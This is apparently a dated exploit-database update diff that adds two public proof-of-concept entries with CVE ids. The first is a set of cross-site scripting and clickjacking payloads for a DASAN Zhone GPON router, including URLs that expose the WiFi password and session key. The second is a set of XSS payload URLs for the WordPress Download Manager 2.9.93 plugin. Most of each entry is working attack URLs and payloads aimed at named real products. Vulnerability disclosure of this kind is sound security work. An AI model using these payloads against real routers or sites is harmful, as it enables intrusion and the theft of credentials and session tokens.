DB: 2019-09-05

2 changes to exploits/shellcodes

WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting
DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting

exploits/hardware/webapps/47351.txt

@@ -0,0 +1,40 @@
+Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters.
+
+# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
+
+# Date: 31.03.2019
+
+# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
+
+# Vendor Homepage: https://dasanzhone.com
+
+# Version: <= S3.1.285
+
+# Alternate Version: <= S3.0.738
+
+# Tested on: version S3.1.285 (alternate version S3.0.738)
+
+# CVE : CVE-2019-10677
+
+
+= Reflected Cross-Site Scripting (XSS) =
+
+http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp
+
+
+= Stored Cross-Site Scripting (XSS) =
+
+* WiFi network plaintext password
+
+http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
+
+http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
+
+* CSRF token
+
+http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//
+
+
+= Clickjacking =
+
+<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>

exploits/php/webapps/47350.txt

@@ -0,0 +1,47 @@
+* Exploit Title: WordPress Download Manager Cross-site Scripting
+* Discovery Date: 2019-04-13
+* Exploit Author: ThuraMoeMyint
+* Author Link: https://twitter.com/mgthuramoemyint
+* Vendor Homepage: https://www.wpdownloadmanager.com
+* Software Link: https://wordpress.org/plugins/download-manager
+* Version: 2.9.93
+* Category: WebApps, WordPress
+CVE:CVE-2019-15889
+Description
+--
+
+In the pro features of the WordPress download manager plugin, there is
+a Category Short-code feature witch can use to sort categories with
+order by a function which will be used as ?orderby=title,publish_date
+.
+By adding parameter "> and add any XSS payload , the xss payload will execute.
+
+To reproduce,
+
+1.Go to the link where we can find ?orderby
+2.Add parameters >” and give simple payload like <script>alert(1)</script>
+3.The payload will execute.
+--
+
+PoC
+--
+
+ <div class="btn-group btn-group-sm pull-right"><button type="button"
+class="btn btn-primary" disabled="disabled">Order &nbsp;</button><a
+class="btn btn-primary"
+href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a
+class="btn btn-primary"
+href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>
+
+--
+Demo
+--
+https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
+--
+
+
+Another reflected cross-site scripting via advance search
+
+https://server/wpdmpro/advanced-search/
+
+https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a

files_exploits.csv

@@ -41702,3 +41702,5 @@ id,file,description,date,author,type,platform,port
 47340,exploits/multiple/webapps/47340.txt,"Alkacon OpenCMS 10.5.x - Local File inclusion",2019-09-02,Aetsu,webapps,multiple,
 47343,exploits/php/webapps/47343.txt,"Craft CMS 2.7.9/3.2.5 - Information Disclosure",2019-09-02,"Mohammed Abdul Raheem",webapps,php,
 47349,exploits/php/webapps/47349.txt,"FileThingie 2.5.7 - Arbitrary File Upload",2019-09-03,cakes,webapps,php,
+47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80
+47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80